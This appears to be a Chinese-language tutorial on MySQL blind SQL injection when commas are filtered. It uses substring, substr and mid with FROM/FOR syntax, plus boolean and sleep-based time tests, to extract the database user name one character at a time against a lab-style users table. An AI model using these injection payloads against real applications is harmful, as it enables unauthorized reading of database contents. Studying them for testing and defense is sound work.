0x00 概要

不允许 逗号(,) 出现时的注入方法

  • substring(str FROM pos)
  • substr(str FROM pos)
  • mid(str FROM pos)


  • 从字符串str的起始位置pos 返回一个子串

0x01 解法

0x01.1 解法一

  1. mysql> select ascii(substring((select user()) from 1));
  2. +------------------------------------------+
  3. | ascii(substring((select user()) from 1)) |
  4. +------------------------------------------+
  5. | 114 |
  6. +------------------------------------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select ascii(substring((select user()) from 2));
  2. +------------------------------------------+
  3. | ascii(substring((select user()) from 2)) |
  4. +------------------------------------------+
  5. | 111 |
  6. +------------------------------------------+
  7. 1 row in set (0.00 sec)

0x01.2 解法二

  • from 表示从什么位置截取,for 表示截取几个字符。
    1. mysql> select substring((select user()) from 1 for 1);
    2. +------------------------------------------+
    3. | substring((select user()) from 1 for 1) |
    4. +------------------------------------------+
    5. | r |
    6. +------------------------------------------+
    7. 1 row in set (0.00 sec)
  1. mysql> select substring((select user()) from 2 for 1);
  2. +------------------------------------------+
  3. | substring((select user()) from 2 for 1) |
  4. +------------------------------------------+
  5. | o |
  6. +------------------------------------------+
  7. 1 row in set (0.00 sec)

0x02 盲注实验

0x02.1 基础数据

  1. // 当前用户
  2. mysql> select user();
  3. +----------------+
  4. | user() |
  5. +----------------+
  6. | root@localhost |
  7. +----------------+
  8. 1 row in set (0.00 sec)
  1. // 测试数据
  2. mysql> select * from users where id = 1;
  3. +----+----------+----------+
  4. | id | username | password |
  5. +----+----------+----------+
  6. | 1 | Dumb | Dumb |
  7. +----+----------+----------+
  8. 1 row in set (0.00 sec)

0x02.2 编码转换

  1. // 第一个字符的ascii码
  2. mysql> select ascii(mid(user() from 1));
  3. +---------------------------+
  4. | ascii(mid(user() from 1)) |
  5. +---------------------------+
  6. | 114 |
  7. +---------------------------+
  8. 1 row in set (0.00 sec)
  1. // 第二个字符的ascii码
  2. mysql> select ascii(mid(user() from 2));
  3. +---------------------------+
  4. | ascii(mid(user() from 2)) |
  5. +---------------------------+
  6. | 111 |
  7. +---------------------------+
  8. 1 row in set (0.00 sec)
  1. // 十进制转码
  2. mysql> select char(114);
  3. +-----------+
  4. | char(114) |
  5. +-----------+
  6. | r |
  7. +-----------+
  8. 1 row in set (0.00 sec)
  1. // 十进制转码
  2. mysql> select char(111);
  3. +-----------+
  4. | char(111) |
  5. +-----------+
  6. | o |
  7. +-----------+
  8. 1 row in set (0.00 sec)

0x02.3 解法一-布尔盲注查询数据库用户名

substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个

  1. // 正确的情况
  2. mysql> SELECT * from users where id = 1 and (select ascii(mid(user() from 1))=114);
  3. +----+----------+----------+
  4. | id | username | password |
  5. +----+----------+----------+
  6. | 1 | Dumb | Dumb |
  7. +----+----------+----------+
  8. 1 row in set (0.00 sec)
  1. // 错误的情况
  2. mysql> SELECT * from users where id = 1 and (select ascii(mid(user() from 1))=119);
  3. Empty set (0.00 sec)

0x02.4 解法一-延时盲注查询数据库用户名

substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个

  1. // 正确的情况
  2. mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=114) then sleep(5) else 0 end;
  3. Empty set (5.00 sec)
  1. // 错误的情况
  2. mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=119) then sleep(5) else 0 end;
  3. Empty set (0.00 sec)

0x02.5 解法二-延时盲注查询数据库用户名

substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个

  1. // 正确的情况
  2. mysql> SELECT * from users where id = 1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 1 end;;
  3. Empty set (5.01 sec)
  1. // 错误的情况
  2. mysql> SELECT * from users where id = 1 and case when(substring(user() from 1 for 1)='s') then sleep(5) else 1 end;;
  3. Empty set (0.00 sec)